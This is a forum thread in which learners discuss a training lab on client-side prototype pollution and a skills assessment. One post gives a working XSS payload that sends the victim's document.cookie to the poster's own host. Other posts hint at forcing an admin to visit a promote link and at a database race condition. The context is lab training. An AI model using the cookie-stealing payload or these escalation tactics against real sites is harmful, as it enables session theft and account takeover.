Whitebox Attacks - Prototype Pollution

I’m stuck on the client-side prototype pollution challenge. I have the following payload that executed XSS on my end, but when I send the link, I receive no request to my HTTP server:

/profile.php?id=2&__proto__[src][]=data:,$.get("http://<tun0>/?".concat(document.cookie));//

Any help is appreciated.

Has anybody managed to find a way to complete the lab? Similarly, I am stuck with the admin triggering the exploit. I tried both GET and POST methods, and with no-cors for the POST request. Still, the admin doesn’t trigger the exploit.

Does anybody know what may be the cause of that?

Thank you!

Hello everyone!

Same issue: prototype pollution + XSS works locally, I can grab my own cookies, but when sent to the admin nothing triggers…
Tried multiple payloads, fetching cookies locally, Burp collab, etc…

Can I / we have a hint? Are there protections to bypass?

Thank you!!

You are not supposed to get the admin’s cookie, but rather construct a link that, when the admin clicks on it, will perform an action that will elevate your privileges. A hint is to inspect the admin page.

3 Likes

Thanks for the hint, I didn’t think about session riding instead of hijacking!!

Have a good day.

1 Like

Hey, I’m stuck on the part about getting the admin to visit the /admin.php?promote=2 page.

I’m able to get the XSS by pointing it to a locally hosted JS file. But when I submit a link in the profile.php page, I don’t receive a request. I’ve been stuck on this for days now. Can anyone give a hint? Thank you.

To anyone who is still stuck, make sure to URL encode the special chars like = in the payload.

3 Likes

If you’re still stuck, then check your fetch. Maybe the full URL isn’t needed?

I got the HTTP GET request that I need to send in order to elevate my privileges, and I was also able to craft a payload that sends a GET request to a URL, which I tested with my HTTP server.
But if I send it to the forms, it doesn’t get executed and I’m not able to access the dashboard.

Tried using $.get and fetch and neither worked.

PS: @ItsSixtyNein’s hint really did the trick.

Guys, I know this is off topic, but has anybody solved the second part of the Whitebox Attacks skills assessment? Stuck on privesc to admin.

Yes, I did… Found that the Skills Assessment was easier than some of the sections.

A hint… There aren’t any locks to the DB while querying it.

Still can’t find the entry point for the race condition. I tried to register an admin user via a race condition, but even if registration is successful I can’t log in. Also tried a race condition on admin.php, but got nothing. Can’t find the place in the code where I can get data before the authorization checks via a race condition.

On the Prototype Pollution section or the SA?

If it’s the SA you can DM me and I’ll hint you, but it’s pretty straightforward.

Hint for anyone stuck on the section question: fully understand each payload shown in the section.